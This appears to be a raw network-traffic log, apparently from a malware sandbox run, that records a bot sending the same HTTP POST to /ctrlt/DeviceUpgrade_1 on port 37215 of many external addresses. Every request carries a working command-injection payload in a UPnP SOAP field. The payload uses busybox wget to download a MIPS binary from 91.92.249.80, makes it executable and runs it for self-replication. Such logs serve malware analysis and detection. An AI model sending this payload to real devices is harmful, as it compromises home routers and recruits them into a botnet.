                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          961192.168.2.2346394157.144.83.11937215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.268805981 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          962192.168.2.2343640146.135.58.14037215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.268812895 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          963192.168.2.235485041.206.72.15037215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.268834114 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          964192.168.2.235875668.86.61.25337215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.268842936 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          965192.168.2.235204041.128.255.2537215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.268853903 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          966192.168.2.234392880.121.212.17337215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.269131899 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          967192.168.2.2359528124.177.225.16437215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.269146919 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          968192.168.2.2346178197.182.131.10637215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.269160032 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          969192.168.2.233691859.174.47.4737215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.269160986 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          970192.168.2.2354088197.2.59.13937215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.269176960 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          971192.168.2.233880249.109.10.10837215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.269191027 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
